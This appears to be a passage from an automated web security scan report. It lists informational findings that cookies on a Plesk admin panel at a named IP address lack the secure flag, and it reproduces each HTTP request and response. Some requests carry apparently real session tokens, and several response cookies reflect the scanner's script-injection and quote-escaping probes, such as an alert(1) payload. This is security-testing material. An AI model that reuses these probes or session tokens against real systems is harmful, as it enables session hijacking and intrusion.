Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10008

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.50. https://50.22.21.242:8443/admin/reseller/tools/id/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/reseller/tools/id/1/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/reseller/tools/id/1/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.51. https://50.22.21.242:8443/admin/server/admin-plan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/server/admin-plan

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/admin-plan HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fadmin%2Fserver%2Fadmin-plan&src=%2Fsmb%2Fsettings%2F&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:48:59 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:49:05 GMT
Connection: close
Content-Length: 208888

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.52. https://50.22.21.242:8443/admin/server/tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/server/tools

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/server/tools?context=tools HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/left.php3
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:30:22 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10033

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.53. https://50.22.21.242:8443/admin/subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:31:05 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=49560ed543a561f7ec0d092c; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10183

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.54. https://50.22.21.242:8443/admin/subscription/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/create

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/create HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/domain/list?context=domains
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:06 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:07 GMT
Connection: close
Content-Length: 17259

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.55. https://50.22.21.242:8443/admin/subscription/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/list

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list?context=subscriptions HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/left.php3
Cookie: locale=en-US; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; BarExpanded=True

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:09:35 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Content-Length: 10103

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.56. https://50.22.21.242:8443/admin/subscription/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/list/reset-search/true/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/list/reset-search/true/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home/admin
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; sessionID=ouhymmzgtdaqakoglnanbrbl; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; PLESKSESSID=b7d5dd4b3a9bb447376c29193bcc7fd3; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 06:49:20 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 06:49:21 GMT
Connection: close
Content-Length: 21006

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.57. https://50.22.21.242:8443/admin/subscription/login/id/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:35:20 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=home%0052142%22%3B9d7ab8babb3; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10445

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.58. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:36:27 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=home173d0%22-alert%281%29-%22741acbedf90; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10202

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.59. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:38:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homefcda7%255c%2522%253bcbb95f53341; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10206

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.60. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/available/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/available/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; psaContext=dashboard; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 04:38:40 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=homefcda7%255c%2522%253bcbb95f53341; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10216

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.61. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/subscription/login/id/1/pageUrl/app/available/id/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/subscription/login/id/1/pageUrl/app/available/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
